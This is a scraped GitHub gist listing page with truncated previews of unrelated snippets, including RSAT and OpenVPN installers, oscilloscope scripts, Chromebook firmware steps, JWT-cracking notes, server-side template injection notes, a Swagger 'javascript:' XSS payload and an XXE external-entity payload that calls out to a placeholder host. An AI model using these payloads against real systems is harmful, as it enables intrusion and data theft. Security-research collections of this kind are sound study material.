Skip to content

Instantly share code, notes, and snippets.

View Install-RSATv1809v1903v1909.ps1
Usage: .\Install-RSATv1809v1903v1909.ps1 [-OPTION]
.\Install-RSATv1809v1903v1909.ps1 -All (-All is installing ALL the features within the RSAT bundle)
.\Install-RSATv1809v1903v1909.ps1 -Basic (-Basic is only installing AD DS, DHCP, DNS, Group Policy Management and Server Manager)
.\Install-RSATv1809v1903v1909.ps1 -ServerManager (-ServerManager is only installing the Server Manager)
.\Install-RSATv1809v1903v1909.ps1 -Uninstall (-Uninstall removes all RSAT features again)
0xBADCA7 / crack_jwt.txt
Created Sep 18, 2020 — forked from pich4ya/crack_jwt.txt
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
View crack_jwt.txt
"alg": "HS256",
"typ": "JWT"
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
View swagger-xss.yml
swagger: '2.0'
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
0xBADCA7 / asus
Created Feb 23, 2020 — forked from jcs/asus
Disabling SPI write protection, reflashing, and unbricking an Asus Chromebook C201
View asus

####Disabling SPI write protection

Put the Chromebook in developer-mode:

  • With machine powered off, hold down Esc and Refresh(F3) while hitting power button
  • At warning prompt, hit Control+D, then Enter at prompt about enabling developer mode
  • Machine will format itself

Now remove the write-protect screw to enable flashrom to flash new Coreboot/Libreboot.

Flip powered-off machine over and remove 8 philips-head screws. 2 are located under rubber feet.

0xBADCA7 /
Created Feb 23, 2020 — forked from pklaus/
Example of controlling a Rigol oscilloscope via Python. Fetch a 1 MB "Long Memory" trace from the oscilloscope and graph it using matplotlib.
#!/usr/bin/env python
Download data from a Rigol DS1052E oscilloscope and graph with matplotlib.
By Ken Shirriff,
Based on
by Cibo Mahto.
0xBADCA7 /
Created Feb 23, 2020 — forked from amarvutha/
Header file for Rigol scope
# Read from Rigol DS1000 scope
# version 1
# 2013-12-27
import visa
import os, serial
import numpy as np
import pylab as plt
import time
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
# Very secure OpenVPN server installer for CentOS
if [[ "$EUID" -ne 0 ]]; then
echo "Sorry, you need to run this as root"
exit 1
0xBADCA7 / mojave.xml
Created Aug 24, 2019 — forked from trongthanh/mojave.xml
macOS Mojave dynamic background re-implement as GTK+ background slideshow. Background images are changed to reflect the time of the day.
View mojave.xml
<!-- Instructions:
- Download and unzip Mojave dynamic background here:
- Rename the extracted folder as "mojave-background" (Excuse the trouble but I renamed it on my machine and already use that path in the XML file)
- Save this xml file next to the Mojave background files
- Fix the path to the background images below (better using absolute path)
- Lastly, either:
+ GNOME: Use gnome-tweaks tool to select this XML as wallpaper (as default wallpaper settings won't let you choose wallpaper from custom path)
+ MATE: Go to background setting (in Appearance) > Choose +Add... > make sure **All files** filter is selected at the bottom right > Then choose mojave.xml
View Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger).md
> Dear ${user.first_name},
Dear sample01

> Dear ${user.password}
FreeMarket template error: the following has evaluated to null or missing...

Q: Is it safe to allow users to upload templates if they are untrusted?